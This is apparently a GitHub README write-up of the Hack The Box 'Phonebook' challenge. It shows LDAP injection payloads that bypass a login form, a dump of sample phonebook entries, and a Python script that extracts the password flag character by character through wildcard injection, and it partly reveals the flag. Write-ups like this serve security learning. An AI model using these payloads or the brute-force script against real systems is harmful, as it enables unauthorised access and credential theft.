Skip to content

Latest commit

 

History

History

Phonebook

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
images
images
 
 
README.md
README.md
 
 
script.py
script.py
 
 

README.md

Phonebook

When we see the login form on the website, it might be command injection, SQL injection, LDAP injection.

We can see that this need us to login with workstation username, it might be LDAP injection.

This is an example of `LDAP injection` payload. We can check for vulnerabilities. 
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))

Our response showed successful, and a search box appeared when we clicked the button.

Then we type a character in the search box, and it returns some user phonebook information. I tried flag, HTB, it doesn't find any results.

If you search for space, you will see such information

Kyle Reese	[email protected]	555-1234567
Ellery Hun	[email protected]	317-959-9562
Madelaine Lush	[email protected]	636-918-1006
Currey Conti	[email protected]	529-673-3935
Chaim Smoth	[email protected]	895-974-4117
Eldin Jelf	[email protected]	363-426-3563
Ganny Marti	[email protected]	796-793-6925
Jobey Olley	[email protected]	607-345-0290
Katalin Wilde	[email protected]	414-839-2681
Stinky Trood	[email protected]	933-416-1003
Tab Zoren	[email protected]	360-678-3613
Ursula Beer	[email protected]	794-396-6882
Bryan Arman	[email protected]	640-255-8092
Babette Cunio	[email protected]	709-363-0223
Berget Novis	[email protected]	780-278-2572
Ced Engley	[email protected]	230-780-1999
Caryn Germon	[email protected]	967-789-6335
Devina Alcide	[email protected]	828-947-3484
Dionne Lammas	[email protected]	824-561-5676
Emmalynn Burnup	[email protected]	148-856-7052
Fredericka Hanks	[email protected]	762-337-5667
Hannah Inder	[email protected]	315-711-6454
Jay Sharma	[email protected]	893-382-5236
Lilyan Crepel	[email protected]	851-980-1038
...

Then we try to find user Reese, but the information doesn't look like flag.

output : Kyle Reese [email protected] 555-1234567

Then we change our payload to check if the password is the flag.

user=Reese
password=HTB*)(&
--> (&(user=Reese)(password=HTB*)(&

This indicates that the payload logs into the web successfully with the payload!

The password is the flag!

Brute force

We need to get the flag through brute force. To do this, write a Python script.

import requests
import string

URL = "~"

asciiLower = list(string.ascii_lowercase)

asciiUppercase = list(string.ascii_uppercase)

passwordList = asciiLower + asciiUppercase + [str(i) for i in range(10)] + ["_", "}"]

payload = "HTB{"
password = ""

while True:
    for ch in passwordList:
        password = payload + ch + "*)(&"

        data = {"username": "Reese", "password": password}
        re = requests.post(URL, data=data)

        if "success" in re.text:
            payload += ch
            print(payload)

The flag is like this 👌👉 HTB{d1rectory_******_**_****}